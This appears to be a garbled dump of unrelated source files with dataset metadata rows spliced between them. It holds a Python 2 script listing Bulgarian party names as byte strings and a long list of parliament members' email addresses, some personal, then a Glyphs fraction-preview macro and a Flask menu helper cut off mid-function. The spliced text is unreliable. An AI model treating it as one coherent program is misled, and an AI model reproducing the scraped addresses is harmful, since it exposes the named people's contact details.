\xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', 
'\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 
\xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 
\xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c']
# The party-name literals above are raw UTF-8 byte strings: decode each
# entry, then map every decoded name onto its canonical party name.
# `map` is kept (rather than a comprehension) so the result type matches
# the original under Python 2 (list) and Python 3 (iterator) alike.
force = map(canonical_party_name,
            [entry.decode('utf-8') for entry in force])
mail = ['aliosman.imamov@gmail.com', 'atanas.kambitov@parliament.bg', 'georgi.andonov@parliament.bg', 'georgi.ikonomov@parliament.bg', 'korneliya.ninova@parliament.bg', 'l.tatarski@parliament.bg, ltatarski@gmail.com', 'mitko.zahov@parliament.bg', 'musa.palev@parliament.bg', 'ognian.tetimov@parliament.bg', 'yanev@parliament.bg, y.yanev@parliament.bg', '', 'volen.siderov@parliament.bg', 'galina.mileva@parliament.bg', 'djevdet.chakarov@parliament.bg', 'dimitar.boychev@parliament.bg', 'DMustafa@parliament.bg', 'i.valkov@parliament.bg, ivalkovv@parliament.bg', 'penkoa@abv.bg,P.Atanasov@parliament.bg', 'P.Oresharski@parliament.bg', 'stoyan.ivanov@parliament.bg', 'stoyan.gyuzelev@parliament.bg', '', 'a.pantev@parliament.bg', 'daniela.petrova@parliament.bg', 'dimitar.karbov@parliament.bg', 'dimitar.atanasov@parliament.bg', 'emil.radev@parliament.bg', 'jordan.tsonev@parliament.bg', 'krasimir.petrov@parliament.bg', 'nikolay.kostadinov@parliament.bg', 'pavel.dimitrov@parliament.bg', 'svetoslav.nedelchev@parliament.bg', 'svilen.kraychev@parliament.bg', 'stanishev@parliament.bg', 'tsveta.georgieva@parliament.bg', 'boyko.velikov@parliament.bg', 'b.stoyanov@parliament.bg', 'vanyo.sharkov@parliament.bg', 'evgeni.stoev@parliament.bg', 'miroslav.petkov@parliament.bg', 'H.Hadjihasan@parliament.bg', 'hristo.hristov@parliament.bg', 'ts.tsvetanov@parliament.bg', '', 'vladimir.toshev@parliament.bg, vtoshev@gmail.com', 'k.petrova@parliament.bg', 'l.stanislavova@nt52.parliament.bg', 'mmikov@nt52.parliament.bg', 'Agov@parliament.bg', 'ventsislav.lakov@parliament.bg, vencilakov@abv.bg', 'gbojinov@parliament.bg', 'm.tagarinski@parliament.bg, mtg@dir.bg', '', 'nikolay.kotzev@parliament.bg, n.kocev@abv.bg', 'nikolay.rashev@parliament.bg', 'galina.bankovska@parliament.bg', 'ivan.todorov@parliament.bg', 'i.nikolov@parliament.bg', 'm.darakchieva@parliament.bg', 'tsvetomir.mihov@parliament.bg', 'valentin.ivanov@parliament.bg', 'vanya.doneva@parliament.bg', 'vvarbanov@parliament.bg', 
'korman@parliament.bg', 'p.dimitrov@parliament.bg', 'rumen.ivanov@parliament.bg', 'svetomir.mihaylov@parliament.bg', 'ahmed.dogan@parliament.bg', '', 'n.ali@parliament.bg,nedzhmi.ali@parliament.bg', 'remzi.osman@parliament.bg', 'U.Tasim@parliament.bg', 'valentin.mikev@parliament.bg, v.mikev@abv.bg', 'd.chukarski@parliament.bg', 'emil.gushterov@parliament.bg', 'kiril.kalfin@parliament.bg', 'maya.manolova@parliament.bg', 'anatoliy.yordanov@parliament.bg', 'evgeniy.uzunov@parliament.bg', 'kiril.gumnerov@parliament.bg', 'mihail.nikolovski@parliament.bg', 'stanka.shaylekova@parliament.bg', 'b.petrova@parliament.bg', 'dimitar.avramov@parliament.bg', 'fidosova@gbg.bg', 'lyubomir.ivanov@parliament.bg', 'plamen.tsekov@parliament.bg', 'yanaki.stoilov@parliament.bg', 'angel.daskalov@parliament.bg', 'G.Pirinski@parliament.bg', 'georgi.petarneychev@parliament.bg', 'ginche.karaminova@parliament.bg, karaminova@abv.bg', 'delyan.peevski@parliament.bg', 'ivan.ivanov@parliament.bg', 'i.mihailova@parliament.bg', 'krasimira.simeonova@parliament.bg', 'nikola.belishki@parliament.bg', 'ANaydenov@parliament.bg', 'vladislav.dimitrov@parliament.bg', 'd.kolev@parliament.bg', 'i.sokolova@parliament.bg', 'peter.petrov@parliament.bg', 'G.Anastasov@parliament.bg', 'd.matov@parliament.bg', 'D.Chukolov@parliament.bg', 'ivelin.nikolov@parliament.bg', 'mithat.metin@parliament.bg', 'plamen.tachev@parliament.bg', 'rumen.petkov@parliament.bg', 'hristina.yancheva@parliament.bg', 'tsvetan.kostov@parliament.bg', 'Predsedatel@parliament.bg', 'velichka.shopova@parliament.bg', 'dimo.gyaurov@parliament.bg', 'z.georgiev@parliament.bg', 'zoya.georgieva@parliament.bg', '', 'kostadin.yazov@parliament.bg', 'menda.stoyanova@parliament.bg', 'pavel.shopov@parliament.bg', 'stefan.dedev@parliament.bg', 'Prof.St.Danailov@parliament.bg', 'georgi.plachkov@parliament.bg', 'dimitar.lazarov@parliament.bg', 'iliya.pashev@parliament.bg', 'jordan.bakalow@parliament.bg', 'm.hristova@parliament.bg', 'nikolay.petkov@parliament.bg', 
'stoichkov@parliament.bg', 'petar.mutafchiev@parliament.bg', 'p.raeva@parliament.bg', 'silviya.hubenova@parliament.bg', 't.naimov@parliament.bg', 'belgin@parliament.bg', 'n.sahlim@parliament.bg', '', 'todor.dimitrov@parliament.bg', 'ademov@parliament.bg', '', 'daniela.mitkova@parliament.bg', 'desislava.atanasova@parliament.bg', 'emel.etem@parliament.bg', 'lyubomir.vladimirov@parliament.bg', 'M.Plugtschieva@parliament.bg', 'plamen.nunev@parliament.bg, paci_rousse@abv.bg', 'svetlana.angelova@parliament.bg', 'anton.kutev@parliament.bg', 'gyunay.sefer@parliament.bg', 'kamen.kostadinov@parliament.bg', 'tab61@parliament.bg', 'stefan.gospodinov@parliament.bg', 'asen.gagauzov@parliament.bg', 'desislava.taneva@parliament.bg', 'dian.chervenkondev@parliament.bg', 'kalina.krumova@parliament.bg', 'kdimitrov@parliament.bg', 'yuliana.koleva@parliament.bg', 'yanko.yankov@parliament.bg', 'arif.agush@parliament.bg', 'daniela.daritkova@parliament.bg', 'dimcho.mihalevski@parliament.bg', 'elin.andreev@parliament.bg', 'nikolay.melemov@parliament.bg, dermax@mail.bg', 'boris.grozdanov@parliament.bg', 'aleksandar.nenkov@parliament.bg', 'anna.yaneva@parliament.bg', 'semov@parliament.bg', 'valentin.nikolov@parliament.bg', 'dimitar.glavchev@parliament.bg', 'emanouela.spassova@parliament.bg', 'ivan.kostov@parliament.bg, dsb@nt14.parliament.bg', 'l.toshev@parliament.bg', 'rumen.ovcharov@parliament.bg', 'teodora.georgieva@parliament.bg', 'yavor.notev@parliament.bg', 'monika.panayotova@parliament.bg', 'veselin.metodiev@parliament.bg', 'genoveva.aleksieva@parliament.bg', 'dgajeva@abv.bg,denitsa.gadjeva@parliament.bg', 'dzhema.grozdanova@parliament.bg', '', 'LachezarBogomilov@parliament.bg', 'kornesov@parliament.bg', 'dimitrovmartin@parliament.bg', 'pkouroumbashev@parliament.bg', 'stoyan.mavrodiev@parliament.bg', 'krasimir.velchev@parliament.bg', 'a.radoslavov@parliament.bg', 'valentina.bogdanova@parliament.bg', '', 'dobroslav.dimitrov@parliament.bg', 'e.michaylova@parliament.bg', 
'ivan.bozhilov@parliament.bg', 'ioana.kirova@parliament.bg', 'kamen.petkov@parliament.bg', 'k.cipov@parliament.bg', 'stanislav.ivanov@parliament.bg', 'daniel.georgiev@parliament.bg', 'dragomir.stoynev@parliament.bg', 'emil.dimitrov@parliament.bg', 'emil.ivanov@parliament.bg', 'kiril.dobrev@parliament.bg', 'pehlivanov@parliament.bg', 's.tanchev@parliament.bg', 'tsvetan.sichanov@parliament.bg', 'evgeniy.zhelev@parliament.bg', 'emil.karanikolov@parliament.bg', 'zhivko.todorov@parliament.bg', 'ivan.kolev@parliament.bg', 'ivan.n.ivanov@parliament.bg, dsbivanov@yahoo.com', 'lyutvi.mestan@parliament.bg', 'nedyalko.nedyalkov@parliament.bg', 'neli.kalneva@parliament.bg, neli_iva@abv.bg', 'petar.hlebarov@parliament.bg', 'spas.panchev@parliament.bg', 't.velikov@parliament.bg', 'erdoan.ahmedov@parliament.bg', 'kasim.dal@parliament.bg', 'lili.boyanova@parliament.bg', 'Takorov@parliament.bg', 'Kardjaliev@parliament.bg', 'G.Serbest@parliament.bg', 'delian.dobrev@parliament.bg', 'e.maslarova@parliament.bg', 'ivan.petrov@parliament.bg', 'ivo.dimov@parliament.bg', 'bat_slavko@abv.bg,stanislav.stanilov@parliament.bg', 'fani.hristova@parliament.bg', 'younal.loutfi@parliament.bg', 'georgi.kolev@parliament.bg', 'dimitar.dabov@parliament.bg', 'ivaylo.toshev@parliament.bg', 'krasimir.minchev@parliament.bg', 'h.bisserov@parliament.bg', 'tchetin@yahoo.com,tchetin.kazak@parliament.bg', 'aleksandar.stoykov@parliament.bg', 'anastas.anastasov@parliament.bg', 'atanas.merdjanov@parliament.bg', 'ognyan.peychev@parliament.bg', 'svetoslav.tonchev@parliament.bg', 'ivan.aleksiev@parliament.bg, aleksiev_ivan@abv.bg', 'vyara.petrova@parliament.bg', 'yanko.ivanov@parliament.bg', 'tsveta.karayancheva@parliament.bg, cveta_@abv.bg', 'stefani.mihaylova@parliament.bg', 'asparuh.stamenov@parliament.bg', 's.dukova@parliament.bg', 'antoniy.yordanov@parliament.bg', '', '', '', 'georgi.terziyski@.parliament.bg', 'r.s.stoilov@abv.bg', 'advvasilev@abv.bg', 'cem_dimitrova@abv.bg', 'r.danev@parliament.bg', 
'yordan.andonov@parliament.bg', 'hamid.hamid@parliament.bg', 'diana.yordanova@parliament.bg', 'katya.koleva@parliament.bg', 'nedyalko.slavov@parliament.bg', 'petko.petkov@parliament.bg', 'plamen.roussev@parliament.bg', 'katya.chalakova@parliament.bg', 'vesselin.davidov@parliament.bg', '', 'liliya.hristova@parliament.bg', 'p.daskalov@parliament.bg', 'z.todorov@parliament.bg', 'v.angelov@parliament.bg', 'a.krustev@parliament.bg', 'ralitsa.todorova@parliament.bg', '', '', '', '', '', '', '', '', 'petar.dulev@parliament.bg', '', '', '', '', '', 'plamen.slavov@parliament.bg', '', '', '', '', '', 'RUMEN.GECHEV@parliament.bg', '', '', '', '', '', '', 'svetla.piralkova@parliament.bg', '', 'roumen.iontchev@parliament.bg', 'stefan.tanev@parliament.bg', '', '', '', '', 'stanislav.vladimirov@parliament.bg', 'spas.panchev@parliament.bg', '', 'smilyana.nitova@parliament.bg', 'siyana.fudulova@parliament.bg', '', '', '', 'todor.radulov@parliament.bg', '', 'tatyana.burudjieva@parliament.bg', '', 'tanyu.kiriakov@parliament.bg', 'strahil.angelov@parliament.bg', '', '', '', '', 'phillip.popov@parliament.bg', '', '', '', '', '', '', '', 'HRISTO.MONOV@parliament.bg', '', '', '', '', '', 'ALEXANDAR.PAUNOV@parliament.bg', '', '', '', '', 'yavor.kuiumjiev@parliament.bg', '', '', 'borislav.gutsanov@parliament.bg', 'boris.tsvetkov@parliament.bg', '', 'atanas.merdjanov@parliament.bg', 'Atanas.Zafirov@parliament.bg', '', 'anton.kutev@parliament.bg', '', '', '', '', '', '', 'vasil.antonov@parliament.bg', 'vanya.dobreva@parliament.bg', 'valeri.jablyanov@parliament.bg', 'valentina.bogdanova@parliament.bg', '', 'georgi.kadiev@parliament.bg', '', 'georgi.marcov@parliament.bg', '', '', '', '', '', '', '', '', '', '', '', 'georgi.gyokov@parliament.bg', 'G.Anastasov@parliament.bg', 'georgi.svilenski@parliament.bg', 'deniza.slateva@parliament.bg', '', '', '', 'dimitar.gorov@parliament.bg', '', '', '', 'deyan.dechev@parliament.bg', '', '', '', '', 'dora.yankova@parliament.bg', '', '', '', 
'dobrin.danev@parliament.bg', 'dimcho.mihalevski@parliament.bg', 'dimitar.dabov@parliament.bg', '', '', '', '', 'Emil.Kostadinov@parliament.bg', '', '', 'emil.raynov@parliament.bg', '', '', '', 'zhelyo.boychev@parliament.bg', '', '', '', 'i.ivanov@parliament.bg', '', '', '', 'ivan.ibrishimov@parliament.bg', '', 'yordanka.yordanova@parliament.bg', 'yordan.mladenov@parliament.bg', '', 'yordan.stoykov@parliament.bg', '', '', 'iliya.batashki@parliament.bg', '', '', '', '', '', '', '', '', '', '', 'krasimir.murdzhev@parliament.bg', 'korneliya.ninova@parliament.bg', '', 'kiril.dobrev@parliament.bg', 'krasimir.yankov@parliament.bg', '', '', '', 'maya.manolova@parliament.bg', 'martin.zahariev@parliament.bg', 'mariana.boyadzhieva@parliament.bg', 'mariana.toteva@parliament.bg', '', '', 'lyubomir.petkov@parliament.bg', '', 'Predsedatel@parliament.bg', '', '', '', 'mincho.minchev@parliament.bg', 'Milko.BAGDASAROV@parliament.bg', 'milka.hristova@parliament.bg', '', 'mladen.cherveniakov@parliament.bg', '', 'nikolay.petev@parliament.bg', '', '', '', '', 'petar.kanev@parliament.bg', 'petar.mutafchiev@parliament.bg', 'pkouroumbashev@parliament.bg', '', '', '', '', 'nikolay.malinov@parliament.bg', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'ventsislav.lakov@parliament.bg, vencilakov@abv.bg', '', '', '', 'delian.dobrev@parliament.bg', '', '', '', '', '', '', '', '', '', '', 'lyubomir.vladimirov@parliament.bg', '', '', '', 'stanishev@parliament.bg', 'lambo.m@parliament.bg', '', '', 'yavor.notev@parliament.bg', 'yanaki.stoilov@parliament.bg', '', '', '', '', '', '', '', '', 'atanas.padev@parliament.bg', 'z.georgiev@parliament.bg', '', '', 'ekaterina.zayakova@parliament.bg', '', 'lazar.popov@parliament.bg', 'margarita.stoilova@parliament.bg', 'zhara.peneva@parliament.bg', 'evdokia.asenova@parliament.bg', 'metodi.kostadinov@parliament.bg', '', '', 'kalin.milchev@parliament.bg', 'georgi.borisov@parliament.bg', 'georgi.andreev@parliament.bg', 
'tasko.ermenkov@parliament.bg', 'penko.atanasov@parliament.bg', 'plamen.zhelyazkov@parliament.bg', '', '', '', '']
# NOTE(review): `name`, `force`, and `url` are parallel lists defined earlier in
# the file (not visible in this chunk); each index appears to describe one
# member-of-parliament record — TODO confirm against the definitions above.
# NOTE(review): Python 2 only — `zip()` returns a list there, so `zip(*s)[0]`
# works; under Python 3 this line raises TypeError ('zip' object is not
# subscriptable).
s = sorted(zip(name,force,url), key=lambda _:_[0])  # records sorted by name
sn = zip(*s)[0]  # names in sorted order, used for positional lookup via .index()
r = []  # collected `url` values
# Names that occur exactly 3 times: keep the first two urls of the sorted run.
c = 3
for _ in set(name):
    if name.count(_) == c:
        i = sn.index(_)
        r.append(s[i][2])
        r.append(s[i+1][2])
# Names that occur exactly 4 times: again keep the first two urls.
c = 4
for _ in set(name):
    if name.count(_) == c:
        i = sn.index(_)
        r.append(s[i][2])
        r.append(s[i+1][2])
# Names that occur 5 or more times: first two urls as well.
c = 5
for _ in set(name):
    if name.count(_) >= c:
        i = sn.index(_)
        r.append(s[i][2])
        r.append(s[i+1][2])
# Names that occur at least twice: when the first two records disagree on
# `force`, keep only the first url; otherwise keep both.
# NOTE(review): because this uses >= 2, names already handled by the c=3/4/5
# loops are processed again here, so their urls appear in `r` multiple times —
# presumably intentional, but verify.
c = 2
for _ in set(name):
    if name.count(_) >= c:
        i = sn.index(_)
        if s[i+1][1] != s[i][1]:
            r.append(s[i][2])
        else:
            r.append(s[i][2])
            r.append(s[i+1][2])
# Unique names: keep their single url.
c = 1
for _ in set(name):
    if name.count(_) == c:
        i = sn.index(_)
        r.append(s[i][2])
r.sort()
# Report the urls above the 1138 cutoff, their count, and the total collected.
# NOTE(review): `_ > 1138` compares url entries against an int — legal only in
# Python 2 if the entries are not ints; confirm the element type of `url`.
print([_ for _ in r if _>1138])
print(len([_ for _ in r if _>1138]))
print(len(r))
| 3,426.607843
| 93,731
| 0.713631
| 39,431
| 174,757
| 3.161827
| 0.028404
| 0.07214
| 0.103229
| 0.071707
| 0.923224
| 0.918564
| 0.909949
| 0.79213
| 0.79213
| 0.776345
| 0
| 0.247406
| 0.024377
| 174,757
| 50
| 93,732
| 3,495.14
| 0.483833
| 0
| 0
| 0.531915
| 0
| 17.255319
| 0.939951
| 0.774464
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.021277
| 0.021277
| 0
| 0.021277
| 0.06383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
52cbc3f6966bc8acd6caef1bf613f6e4d3902bfb
| 737
|
py
|
Python
|
Tabs/Tab with fractions.py
|
huertatipografica/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 19
|
2015-09-17T11:55:39.000Z
|
2021-02-24T18:29:02.000Z
|
Tabs/Tab with fractions.py
|
andrestelex/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 2
|
2015-11-07T00:57:46.000Z
|
2016-08-25T23:15:12.000Z
|
Tabs/Tab with fractions.py
|
andrestelex/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 1
|
2015-05-06T23:52:37.000Z
|
2015-05-06T23:52:37.000Z
|
# MenuTitle: Tab with fractions
# Glyphs.app macro: opens a new Edit tab previewing percent/permille signs and
# every numerator/denominator pairing from 00/00 through 09/90 with the
# fraction slash, so the .numr/.dnom glyphs can be proofed side by side.
# Each "/glyphname" token is a glyph reference in Glyphs' tab-text syntax.
tabString = """/percent/perthousand/space/period/space/fraction
/zero.numr/zero.numr/fraction/zero.dnom/zero.dnom/space/space/zero.numr/one.numr/fraction/one.dnom/zero.dnom/space/space/zero.numr/two.numr/fraction/two.dnom/zero.dnom/space/space/zero.numr/three.numr/fraction/three.dnom/zero.dnom/space/space/zero.numr/four.numr/fraction/four.dnom/zero.dnom/space/space/zero.numr/five.numr/fraction/five.dnom/zero.dnom/space/space/zero.numr/six.numr/fraction/six.dnom/zero.dnom/space/space/zero.numr/seven.numr/fraction/seven.dnom/zero.dnom/space/space/zero.numr/eight.numr/fraction/eight.dnom/zero.dnom/space/space/zero.numr/nine.numr/fraction/nine.dnom/zero.dnom/(null)
"""
# `Glyphs` is the application object injected by the Glyphs macro environment.
Glyphs.font.newTab(tabString)
| 105.285714
| 605
| 0.807327
| 124
| 737
| 4.798387
| 0.209677
| 0.147899
| 0.201681
| 0.257143
| 0.453782
| 0.453782
| 0.453782
| 0
| 0
| 0
| 0
| 0
| 0.016282
| 737
| 6
| 606
| 122.833333
| 0.82069
| 0.039349
| 0
| 0
| 0
| 0.25
| 0.927762
| 0.924929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e119db45feaf156b95e1991f902991d8d101f69
| 2,328
|
py
|
Python
|
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
# getters for common blocks of template code
# copyright (c) 2018 wildduck.io
from app_src.admin.app_roles import *
def get_hamburger_menu_items_by_role(user_role_list):
    """Return the hamburger-menu HTML list items for the caller's role.

    Args:
        user_role_list: iterable of role constants for the current user.

    Returns:
        str: concatenated ``<li>`` elements for the matching menu.
    """
    # Precedence: admin beats recruiter; anyone else gets the talent menu.
    if ROLE_ADMIN in user_role_list:
        return __get_admin_hamburger_menu_items()
    if ROLE_RECRUITER in user_role_list:
        return __get_recruiter_hamburger_menu_items()
    return __get_talent_hamburger_menu_items()
def __get_admin_hamburger_menu_items():
    """Single source of truth for the admin hamburger-menu list items.

    Returns:
        str: html5 ``<li>`` elements for the hamburger menu.
    """
    items = (
        "<li><a href='/peekaboo'><span class='glyphicon glyphicon-king'></span> Admin</a></li>",
        "<li><a href='/jobs'><span class='glyphicon glyphicon-briefcase'></span> Jobs</a></li>",
        "<li><a href='/talent'><span class='glyphicon glyphicon-user'></span> Talent</a></li>",
        "<li role='separator' class='divider'></li>",
        "<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>",
    )
    return "".join(items)
def __get_recruiter_hamburger_menu_items():
    """Single source of truth for the recruiter hamburger-menu list items.

    Returns:
        str: html5 ``<li>`` elements for the hamburger menu.
    """
    items = (
        "<li><a href='/jobs'><span class='glyphicon glyphicon-briefcase'></span> Jobs</a></li>",
